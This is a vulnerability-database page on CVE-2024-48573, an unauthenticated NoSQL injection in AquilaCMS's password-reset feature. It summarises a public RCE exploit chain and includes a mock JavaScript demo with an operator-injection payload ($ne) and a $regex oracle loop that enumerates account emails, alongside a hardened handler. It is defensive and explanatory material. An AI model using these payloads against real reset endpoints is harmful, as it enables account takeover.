CVE-2024-48573

CRITICAL

AquilaCMS <= 1.409.20 - Unauthenticated NoSQL Injection via Password Reset Feature

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2024-48573, a PoC published by Eui Chul Chung.

AI-analyzed exploit summary: the exploit leverages CVE-2024-48573 to achieve remote command execution in AquilaCMS 1.409.20 by brute-forcing user emails through the NoSQL injection, resetting passwords, and then uploading a malicious plugin that executes arbitrary commands when it is deactivated.

Description

A NoSQL injection vulnerability in AquilaCMS 1.409.20 and prior allows unauthenticated attackers to reset user and administrator account passwords via the "Reset password" feature. Because the attacker-controlled value reaches the database query without type enforcement, query operators can be supplied in place of a plain string, which turns the reset lookup into an oracle for enumerating accounts and into a way to select a victim account without knowing its address.
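The following is an added illustration of the vulnerability class, not AquilaCMS's own code (the page does not reproduce the affected handler). It assumes, as the CVE description implies, a Node.js handler that looks a user up in MongoDB by the `email` field taken from the request body. The in-memory collection, the `USERS` records, the handler names and the character alphabet are all constructed for this example. The vulnerable and hardened handlers sit side by side, and `recoverEmail` shows how a `$regex` filter turns the reset endpoint into a yes/no oracle that recovers an address one character at a time, the "brute-forcing user emails" step of the published chain in miniature.

```javascript
// Added example (not AquilaCMS code): NoSQL operator injection in a
// password-reset lookup, with the hardened form and an enumeration oracle.

// Constructed sample users; not real data.
const USERS = [
  { email: 'admin@example.com', role: 'admin' },
  { email: 'alice@example.com', role: 'user' },
];

// Minimal stand-in for MongoDB field matching: a plain value is an equality
// test; an object is a set of operators. Only $eq, $ne and $regex are modelled.
function matchField(value, cond) {
  if (cond !== null && typeof cond === 'object' && !Array.isArray(cond)) {
    return Object.entries(cond).every(([op, arg]) => {
      switch (op) {
        case '$eq': return value === arg;
        case '$ne': return value !== arg;
        case '$regex': return new RegExp(arg).test(value);
        default: throw new Error('unsupported operator: ' + op);
      }
    });
  }
  return value === cond;
}

function findOne(collection, filter) {
  return collection.find(doc =>
    Object.entries(filter).every(([field, cond]) => matchField(doc[field], cond))) || null;
}

// Vulnerable pattern: the parsed JSON value of "email" goes into the query
// untouched, so a client may send {"email": {"$ne": ""}} instead of a string.
function resetPasswordVulnerable(body) {
  const user = findOne(USERS, { email: body.email });
  if (!user) return { status: 404 };
  // A real handler would now issue a reset token or set a new password for `user`.
  return { status: 200, email: user.email };
}

// Hardened pattern: require a string and pin the query to equality, so no
// operator object can reach the database.
function resetPasswordHardened(body) {
  if (typeof body.email !== 'string') return { status: 400 };
  const user = findOne(USERS, { email: { $eq: body.email } });
  if (!user) return { status: 404 };
  return { status: 200, email: user.email };
}

// Attacker side: treat "reset accepted" as a true/false oracle and extend a
// known prefix one character at a time with anchored $regex filters.
const ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789@._-+';

function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

function recoverEmail(oracle, seed = '', maxLen = 64) {
  let known = seed;
  for (let i = 0; i < maxLen; i++) {
    // Exact match means the whole address has been recovered.
    if (oracle({ email: { $regex: '^' + escapeRegex(known) + '$' } })) return known;
    const next = [...ALPHABET].find(c =>
      oracle({ email: { $regex: '^' + escapeRegex(known + c) } }));
    if (next === undefined) return null; // no account extends this prefix
    known += next;
  }
  return null;
}

const vulnOracle = body => resetPasswordVulnerable(body).status === 200;
const hardOracle = body => resetPasswordHardened(body).status === 200;

console.log('$ne bypass against vulnerable handler:', resetPasswordVulnerable({ email: { $ne: '' } }));
console.log('address recovered via $regex oracle:', recoverEmail(vulnOracle));
console.log('same attack against hardened handler:', recoverEmail(hardOracle));
```

The `$ne` request alone is enough to select the first matching account (here the administrator) without knowing any address, which is the "reset administrator account passwords" outcome in the description; the `$regex` loop is what makes the subsequent targeted resets possible. In a real deployment the same type check belongs at the schema or validation layer, and a library such as `express-mongo-sanitize` can strip `$`-prefixed keys as a second line of defence.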

Exploits (1)

Exploit-DB · Working PoC
by Eui Chul Chung · python · webapps · php
https://www.exploit-db.com/exploits/52164

Classification
Working PoC (95% confidence)
Attack Type
RCE
Complexity
Moderate
Reliability
Reliable
Target: AquilaCMS v1.409.20
No auth needed
Prerequisites: Network access to the target AquilaCMS instance
Analyzed by devstral-2 on Feb 16, 2026

References (1)

Scores

CVSS v3.1 9.8 (Critical)
EPSS 0.0100
EPSS Percentile 58.2%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable yes
Technical Impact total

Details

CWE
CWE-89 (Improper Neutralization of Special Elements used in an SQL Command, as assigned; NoSQL operator injection is more precisely CWE-943)
Status published
Products (1)
aquila-cms/aquilacms <= 1.409.20
Published Oct 29, 2024
Tracked Since Feb 18, 2026